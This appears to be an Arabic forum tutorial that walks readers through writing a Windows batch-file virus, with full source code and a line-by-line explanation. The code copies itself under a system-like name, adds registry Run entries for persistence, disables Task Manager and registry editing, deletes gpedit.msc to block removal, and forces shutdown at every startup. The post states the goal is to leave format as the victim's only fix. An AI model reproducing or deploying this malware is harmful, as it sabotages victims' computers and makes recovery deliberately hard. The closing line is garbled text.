بسم الله الــرحمن الــرحيم ملاحظة هامة جدا للاخوة: لرؤية الكتابات اللي باللغة الانكليزية بشكل صحيح اضغط left shift+left ctrl ببرنامج النوتباد ثانيا : لواحق الملفات المستخدمة بالشرح هي exe مو بات لأننا راح نحول ملف البات الي exe نبدأ اولا بشرح مهام الاوامر المستخدمة في الفايرس: @echo off : وهو أمر مهم لكل ملف بات ومهمته منع اظهار الاوامر المنفذة على نافذة الدوز If EXIST : وهو امر شرطي بمعنى اذا كان هذا الملف منشأ من قبل GOTO : معناه اذهب اللى أو نفذ اجراء المعين If Not EXIST : هو عكس الامر السابق ":shut و :Bull" : أسماء الاجراءات وهذي الاسماء اختيارية reg add : لاضافة قيمة للريجستري del: حذف ملف معين shutdown -s -t 1 : ايقاف تشغيل الجهاز مباشرة shutdown -r -t 1 : اعادة تشغيل الجهاز مباشرة %windir% : وهو متغير هام جدا لمعرفة قرص النظام المعين الموجود فيه ملف WINDOWS لاننا لو كتبنا مثلا : D:\windwos , بدلا من %windir% يمكن يكون قرص النظام هو F أو D وهيك راح يتعطل الفايرس بعد ما شرحنا الاوامر المهمة وقبل ما أبدأ بالشرح الرئيسي بدي نوه أن هذا الفايرس محتاج أيضا لبعض التعديلات وما في شي كامل , ولكن هدف هذا الموضوع هو مساعدة الاخوة في كيفية التعامل مع الدوال الصعبة في الدوس وخاصة المتعلقة بالريجستري أولا : طريقة عمل هذا الفايرس : هذا الفايرس بيقوم بنسخ نفسه نسختان واحدة منهم للتمويه والتانية وهي ملف الفايرس الرئيسي واللي بيشتغل مع تشغيل النظام وبيعمل شت داون , وحتى يشتغل مع الجهاز لازم نضيف قيمة للملف بالمفتاح RUN الموجود بالريجستري وهذا مساره: HKLM\software\Microsoft\Windows\CurrentVersion\run وأما بالنسبة للسيف مود فالملف ما راح يشتغل مع الجهاز وممكن اللي اصيب بالفايرس يدخل بكل بساطة من السيف مود وبعدين للريجستري ويحذف قيمة تشغيل الملف منه لهيك بيقوم الفايرس بتعطيل الريجستري , وال GRUOP POLICY ? ال GRUOP POLICY هو برنامج يمكنكم الدخول له عن طريق الذهاب الى تشغيل واكتب : gpedit.msc حيث انه اذا كان الشحص المصاب بالفايرس خبير شوي ممكن يفك تعطيل الريجستري عن طريقه, لهيك راح يقوم الفايرس بحذف ملف gpedit.msc هيك صار تقريبا الفايرس شبه محمي يعني 78 % محمي وحله الوحيد الFORMAT ثانيا : كتابة الكود: انشأ ملف بات فارغ اسمه Blz وانسخ فيه الكود كاملا : @echo off if exist %windir%\System32\System111.exe goto shut if NOT exist %windir%\System32\System111.exe goto Bull :Bull copy Blz.exe d:\3.exe copy Blz.exe %windir%\System32\System111.exe reg add HKLM\software\Microsoft\Windows\CurrentVersion\run /v BlzOfHK /t REG_SZ /d "d:\3.exe" reg add HKLM\software\Microsoft\Windows\CurrentVersion\run /v System32 /t REG_SZ /d "d:\windows\System32\system111.exe" reg add HKCU\software\Microsoft\Windows\CurrentVersion\Pol icies\System /v "DisableTaskMgr" /t REG_DWORD /d 0000001 /f reg add HKCU\software\Microsoft\Windows\CurrentVersion\Pol icies\System /v "DisableRegistryTools" /t REG_DWORD /d 0000001 /f del %windir%\system32\gpedit.msc del Blz.exe shutdown -r -t 1 shut: shutdown -s -t 1 سبق وشرحنا مهمة الامر echo off , واما السطر التاني بالكود فبيقول : اذا كان الملف system111.exe ( ملف الفايرس ) منشأ في مجلد system32 معناه الجهاز مصاب بالفايرس وما في حاجة لعملية نسخ نفسه و تكوين قيم التشغيل في الريسجتري " اذهب للإجراء Shut وهو اجراء ايقاف التشغيل واما السطر الثالث فبيقول: اذا لم يكن الملف system111.exe منشأ في مجلد system32 معناه انه لازم تقوم بعملية بناء الفايرس ونسخ نفسه للمجلد system32 وتكوين قيم الريجستري , وبتكون عملية بناء الفايرس على مراحل هي : :BULL وهو اسم الاجراء 1) copy Blz.exe d:\3.exe copy Blz.exe %windir%\System32\System111.exe وهي نسخ ملف الفايرس ( اللي اسمه Blz) نسختان 2)reg add HKLM\software\Microsoft\Windows\CurrentVersion\run /v BlzOfHK /t REG_SZ /d "d:\3.exe" انشاء قيمة في الرجستري بالمفتاح run ونوع هذي القيمة REG_SZ" يعني سلسلة واسمها BlzOfHK وبياناتها "d:\3.exe" أي مسار الملف المراد تشغيله 3)reg add HKLM\software\Microsoft\Windows\CurrentVersion\run /v System32 /t REG_SZ /d "d:\windows\System32\system111.exe" نفس الامر السابق تماما لكن مع تغيير اسم القيمة لاسم متعلق بالنظام ( للخداع فقط) وبياناتها 4)reg add HKCU\software\Microsoft\Windows\CurrentVersion\Pol icies\System /v "DisableTaskMgr" /t REG_DWORD /d 0000001 /f وهذا الامر هو لتعطيل ال TaskManger وفيه مسار القيمة وبعدين اسمها وهو : "DisableTaskMgr" ونوعها : REG_DWOR" أي قيمة ثنائية و بياناتها , بس لاحظوا آخر الكود السابق وهو /f وهو اختصار لكلمة force أي اجبار الريجستري على انشاء القيم دون التخيير بين نعم ولا وللتوضيح روح للدوز واكتب الكود السابق بدون /f تلاقي الدوس عطاك خياران yes أو No 5) reg add HKCU\software\Microsoft\Windows\CurrentVersion\Pol icies\System /v "DisableRegistryTools" /t REG_DWORD /d 0000001 /f نفس الكود السابق تماما مع تغيير اسم القيمة فقط ومهمته تعطيل الريجستري 6)del %windir%\system32\gpedit.msc لحذف ملف gpedit.msc 7)shutdown -r -t 4 : لاعادة التشغيل ولو تلاحظوا عطيناه 4 ثواني حتى يحذف الفايرس نفسه قبل اعادة التشغيل 8) del Blz.exe : لحذف ملف الفايرس بعد القيام بكل العمليات السابقة واما الاجراء :shut فهو خارج العمليات السابقة أي مستقل عنها ومهمته ايقاف التشغيل
:ange::ange::ange::ange::ange::ange::ange::ange:
gglfj]zdk ,hglj,s'dk jtqg,h fhg]o,g